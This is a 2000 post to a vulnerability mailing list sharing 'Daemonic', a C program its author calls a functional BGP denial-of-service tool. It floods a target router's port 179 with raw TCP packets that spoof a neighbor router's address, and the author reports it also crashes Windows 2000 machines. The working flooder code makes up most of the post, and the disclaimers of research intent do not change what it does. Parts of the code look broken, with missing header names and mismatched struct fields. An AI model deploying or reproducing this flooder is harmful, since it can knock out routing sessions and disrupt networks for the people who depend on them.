From: J. Oquendo [intrusion@ENGINEER.COM] Sent: Thursday, August 24, 2000 3:59 PM To: VULN-DEV@SECURITYFOCUS.COM Subject: Daemonic Greetings all. While working on a paper on DoS and networking I came up with a BGP session killer which also seemed to crash my Wintrash2000 laptop. The code was chopped up and geared to focus on BGP so its port is set to 179. Now my laptop wasn't running anything on that port but it still managed to crash it after a few minutes... Anyways snip to the code maybe you can determine what it is... Be advised however this is a functional BGP DoS as well. Odd it would crash Windows but it has... --- snip to description and code --- Daemonic is a theoretical based attack based on the notion that a Neighbor router will ignore another Neighbor when bad information is being sent by default (see Error Code #6 on BGP faq's) Based on the information you gather from one network by sending spoofed packets as a neighbor router you may be able to kill the connection entirely. Written on a Ultra 5 running Linux Zoot, this has been compiled on Linux, OpenBSD, Solaris without problems. /* * Daemonic is part of the Theories in DoS project which I began earlier this year to introduce * routing based attack methods in hopes of finding ways to fix them. This was started as a hobby * doc I threw together while I study for my certifications. This is not meant to be used for * malicious purposes and I truly do not mean for anyone to use it for those purposes either. This * can be used to test theories and find ways of fixing them b4 they become an epidemic. This tool * is theoretical and should not be used to break networks but rather find solutions to fix them. * Greets to everyone in #unixgods, obecian, qwer7y and tattooman, hale@deviance.org, spikeman, * speye, bsd-pat and too many more to list. Super greets to Rajak of the efnet for pointing out * deficiencies in my argv values and also pre-testing along with me. Please note this also tends * to crash WinDoS 2000 machines whether or not they're running something on port 179... Weird * shit but hey thats Microtrash. Coding was chopped up from too many sources to remember so if * something seems familiar please respond and I will add your name if it makes you happy. * This theorized DoS is based on the presumption that routers who flood their neighbors will be * ignored therefore killing the connection. I plan on tweakning up something to send BGP error * code 6's as NEIGHBOR(spoofed) --> NEIGHBOR to see whether or not that would break connectivity. * So for all you CCNA, CCIE, CCDP geekazoids, time to throw on some egress filtering since this * is not a host based attack sizes should be tweaked for different effects/affects (your choice) * If anyone cares to e-mail me with Theoretical Based attacks please feel free to do so... * Flames, death threats, pr0n, 0-day, etc should be sent to: * J. Oquendo sil@antioffline.com www.antioffline.com/TID Theories in DoS * (c) Means nothing to me unless your pointing a gun to my dome */ #include #include #include #include #include #include #include #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include #include #include #include #include #include #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr, daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_syn; u_int th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; }; struct tcpopt_hdr { u_char type; u_char len; u_short value; }; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short bgport, bgsize, pps; u_long radd; u_long sradd; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s \n", progname); fprintf(stderr, "Ports are set to send and receive on port 179\n"); fprintf(stderr, "radd:\tAddress of router running BGP [victim]\n"); fprintf(stderr, "sradd:\tSource address of neighbor router running BGP [attacker]\n"); /* fprintf(stderr, "bgport:\tBGPort is set to 179 and should not be changed\n"); */ /* should you want to change this to test other protocols */ fprintf(stderr, "bgsize:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n"); fprintf(stderr, "num:\tpulverizations per second\n\n"); exit(1); } inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Silly crackhead... scripts are for kidz\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x40; packet.ip.ip_id = radd; packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = radd; packet.tcp.th_flags = 0; packet.tcp.th_win = htons(65535); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 0; packet.tcp.th_urp = 0; packet.tcp.th_dport = 179; cksum.pseudo.daddr = sradd; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = sradd; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { if( !(i&0x3FF) ) { packet.tcp.th_sport = 179; cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; packet.tcp.th_flags = TH_ACK; packet.tcp.th_ack = 31337; } else { packet.tcp.th_flags = TH_ACK; packet.tcp.th_ack = rand(); } ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!bgport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } int main(int argc, char *argv[]) { int on = 1; printf("Daemonic - BGP Killer [Theories in DoS] www.AntiOffline.com/TID/ \n\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nFinding Router\n"); fflush(stdout); radd = lookup(argv[1]); bgport = atoi(argv[3]); bgsize = atoi(argv[4]); sradd = lookup(argv[2]); printf("Thou shall not kill thy neighbor\n"); flooder(); return 0; } ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup